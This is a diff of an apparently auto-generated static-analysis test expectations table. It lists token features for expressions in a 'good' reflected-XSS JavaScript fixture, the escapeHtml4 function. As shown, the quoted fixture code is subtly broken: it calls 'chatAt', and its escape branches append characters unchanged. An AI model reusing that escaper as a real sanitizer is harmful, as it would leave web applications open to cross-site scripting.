contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | return of function escapeHtml4 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | return of function escapeHtml4 | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | return of function escapeHtml4 | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:1:132:1 | return of function escapeHtml4 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:10:112:20 | escapeHtml4 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:10:112:20 | escapeHtml4 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:10:112:20 | escapeHtml4 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:10:112:20 | escapeHtml4 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:10:112:20 | escapeHtml4 | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:10:112:20 | escapeHtml4 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:10:112:20 | escapeHtml4 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:22:112:22 | s | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:22:112:22 | s | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:22:112:22 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:22:112:22 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:22:112:22 | s | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:22:112:22 | s | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:22:112:22 | s | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:22:112:22 | s | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:22:112:22 | s | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:112:22:112:22 | s | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:9 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:9 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:9 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:9 | buf | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:9 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:14 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:14 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:14 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:14 | buf | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:14 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:14 | buf = "" | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:14 | buf = "" | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:14 | buf = "" | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:14 | buf = "" | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:7:113:14 | buf = "" | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:13:113:14 | "" | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:13:113:14 | "" | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:13:113:14 | "" | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:13:113:14 | "" | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:113:13:113:14 | "" | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:10 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:10 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:10 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:10 | buf | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:10 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:10 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:10 | i | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:10 | i | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:10 | i | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:10 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:21 | i < s.length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:21 | i < s.length | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:21 | i < s.length | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:21 | i < s.length | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:10:114:21 | i < s.length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:14:114:14 | s | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:14:114:14 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:14:114:14 | s | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:14:114:14 | s | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:14:114:14 | s | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:14:114:21 | s.length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:14:114:21 | s.length | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:14:114:21 | s.length | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:14:114:21 | s.length | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:14:114:21 | s.length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:16:114:21 | length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:16:114:21 | length | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:16:114:21 | length | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:16:114:21 | length | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:114:16:114:21 | length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:10 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:10 | ch | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:10 | ch | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:10 | ch | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:10 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:26 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:26 | ch | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:26 | ch | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:26 | ch | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:26 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:26 | ch = s.chatAt(i++) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:26 | ch = s.chatAt(i++) | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:26 | ch = s.chatAt(i++) | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:26 | ch = s.chatAt(i++) | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:9:115:26 | ch = s.chatAt(i++) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:14 | s | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:14 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:14 | s | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:14 | s | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:14 | s | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:21 | s.chatAt | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:21 | s.chatAt | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:21 | s.chatAt | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:21 | s.chatAt | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:21 | s.chatAt | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:26 | exceptional return of s.chatAt(i++) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:26 | exceptional return of s.chatAt(i++) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:26 | exceptional return of s.chatAt(i++) | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:26 | exceptional return of s.chatAt(i++) | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:26 | exceptional return of s.chatAt(i++) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:26 | s.chatAt(i++) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:26 | s.chatAt(i++) | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:26 | s.chatAt(i++) | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:26 | s.chatAt(i++) | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:14:115:26 | s.chatAt(i++) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:16:115:21 | chatAt | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:16:115:21 | chatAt | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:16:115:21 | chatAt | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:16:115:21 | chatAt | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:16:115:21 | chatAt | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:23:115:23 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:23:115:23 | i | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:23:115:23 | i | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:23:115:23 | i | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:23:115:23 | i | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:23:115:25 | i++ | CalleeFlexibleAccessPath | s.chatAt | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:23:115:25 | i++ | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:23:115:25 | i++ | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20953,6 +139726,134 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:23:115:25 | i++ | enclosingFunctionName | escapeHtml4 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:23:115:25 | i++ | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:115:23:115:25 | i++ | receiverName | s | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:116:13:116:14 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:116:13:116:14 | ch | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:116:13:116:14 | ch | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:116:13:116:14 | ch | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:116:13:116:14 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:117:12:117:14 | '&' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:117:12:117:14 | '&' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:117:12:117:14 | '&' | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:117:12:117:14 | '&' | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:117:12:117:14 | '&' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:11 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:11 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:11 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:11 | buf | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:11 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:11 | buf | stringConcatenatedWith | -endpoint- '&' | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:22 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:22 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:22 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:22 | buf | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:22 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:22 | buf += '&' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:22 | buf += '&' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:22 | buf += '&' | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:22 | buf += '&' | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:9:118:22 | buf += '&' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:16:118:22 | '&' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:16:118:22 | '&' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:16:118:22 | '&' | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:16:118:22 | '&' | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:16:118:22 | '&' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:118:16:118:22 | '&' | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:120:12:120:14 | '<' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:120:12:120:14 | '<' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:120:12:120:14 | '<' | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:120:12:120:14 | '<' | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:120:12:120:14 | '<' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:11 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:11 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:11 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:11 | buf | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:11 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:11 | buf | stringConcatenatedWith | -endpoint- '<' | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:21 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:21 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:21 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:21 | buf | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:21 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:21 | buf += '<' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:21 | buf += '<' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:21 | buf += '<' | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:21 | buf += '<' | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:9:121:21 | buf += '<' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:16:121:21 | '<' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:16:121:21 | '<' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:16:121:21 | '<' | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:16:121:21 | '<' | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:16:121:21 | '<' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:121:16:121:21 | '<' | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:123:12:123:15 | '\\"' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:123:12:123:15 | '\\"' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:123:12:123:15 | '\\"' | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:123:12:123:15 | '\\"' | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:123:12:123:15 | '\\"' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:11 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:11 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:11 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:11 | buf | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:11 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:11 | buf | stringConcatenatedWith | -endpoint- '"' | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:23 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:23 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:23 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:23 | buf | enclosingFunctionName | escapeHtml4 | +| 